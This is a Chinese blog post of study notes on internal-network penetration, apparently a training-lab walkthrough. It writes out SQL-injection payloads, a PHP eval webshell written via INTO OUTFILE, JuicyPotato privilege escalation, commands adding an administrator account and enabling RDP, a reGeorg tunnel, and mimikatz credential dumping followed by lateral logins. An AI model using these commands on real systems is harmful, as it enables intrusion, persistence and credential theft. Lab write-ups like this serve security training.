内网渗透(一)自己留着看

mrdoctorg   ·   发表于 2022-04-21 16:55:55   ·   学习杂记

内网渗透所用的工具

烂土豆的功能

能够自动拿取系统的最高权限,并且对windows全版本通杀,如果系统版本不兼容就可以指定系统 烂土豆.exe -p “whoami” -c{}

Regeorg功能

考虑一种场景,有两个主机A和B。其中主机A上运行了Web服务,且端口映射到公网,可以被网布人员访问,主机B是在网访问不到的。攻击者通过楼哦东在主机A上传了webshell,但同时又处于某些限制不能得到A的主机权限,这个时候也无法通过常规方法直接登录到主机B获取权限。
这个时候reGeorg在这个时候又了很大的作用,攻击者已经有了主机A的webshell权限,而主机A能够同主机B通信,那么在主机A上安装reGeorg工具,使得攻击者发出的请求能够通过A转达到B,而B的响应能够转达到攻击者。

连接语法:
py -2 reGeorgSocksProxy.py -u 文件地址 -l 127.0.0.1 -p 端口

猕猴桃的作用

猕猴桃提权,并将密码通过纯明文的形式显示出来

碰撞的语法

privilege::debug 提神权限
log
sekurlsa::logopasswords 抓取密码

proxifier的作用

能够添加代理服务器,设置代理规则,只对某个进程进行代理,可以防止网络被影响。

靶场作业

一、判断是否存在sql注入
输入:id=1 and 1=2
二、判断字段数
输入:id=1 order by 3
结果:字段数为2
三、判断显错位
输入:id=1 and 1=2 union select 1,2
结果:显错位在第二位
四、写入一句话木马
id=1.1 union select 1,’<?php eval($_REQUEST[8];)?>’ into outfile ‘C:/phpStudy/WWW/22.php’


进去之后右键进入虚拟终端
发现自己不是管理员权限


使用命令 systeminfo发现靶机的系统为
OS Microsoft Windows Server 2008 R2 Standard


使用烂土豆提权


查看3389端口是否开启
使用烂土豆管理员系统命令添加账户
1111.exe -p “net user abc A1B2C3!.Qa /add”
1111.exe -p “net localgroup administrators abc /add”
使用tasklist 查看进程

如何将3389端口开启
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

将文件tunnel.nosocket.php拖入菜刀来建立正向连接
前提:安装了 urllib3(python -m pip install urllib3)
输入py -3 reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/22.php -l 127.0.0.1 -p 10086

使用proxifier代理
将猕猴桃拖入菜刀
远程连接目标主机
使用猕猴桃碰撞密码
前提:使用管理员身份进行碰撞
输入:
1、privilege::debug
2、log
3、sekurlsa::logonpasswords
结果:获取密码为 woshifengge1.

我们不断尝试远程连接10.0.1.0的所有内网ip
凭据:用户:Administrator 密码:woshifengge1.
结果:在10.0.1.8连接成功(这边建议不要想我一样,可以尝试s扫描器)获取flag

打赏我,让我更有动力~

2 条回复   |  直到 2022-4-27 | 986 次浏览

dy1748569
发表于 2022-4-22

写得
挺好的

评论列表

  • 加载数据中...

编写评论内容

unbias
发表于 2022-4-27

没记错的话,对于windows11版本是不行的

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.